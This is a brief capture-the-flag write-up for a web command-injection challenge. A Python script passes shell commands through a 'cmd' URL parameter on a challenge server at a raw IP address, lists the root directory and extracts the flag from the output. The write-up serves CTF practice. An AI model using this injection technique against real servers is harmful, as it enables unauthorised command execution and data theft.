Tags: web command_injection python 

Rating: 5.0

You can use the command `ls /` for listing files and directories and `nl *` for looking for the flag string. Here is the python code to solve this challenge.

```
import requests
html = requests.get('http://207.180.200.166:8000/?cmd=ls /')
print(html.text.strip())
html = requests.get('http://207.180.200.166:8000/?cmd=nl *')
text = ''
for line in html.text:
text += line.strip()
a = text.find('flag{')
b = text.find('}', a + 6) + 1
print(text[a:b])
```

Here is the result from the python code.

```
bin
dev
etc
flag.txt
home
lib
media
mnt
proc
root
run
sbin
srv
sys
tmp
usr
var
flag{ju57_g0tt@_5pl1t_Em3012}
```

You will got the flag.

```
flag{ju57_g0tt@_5pl1t_Em3012}
```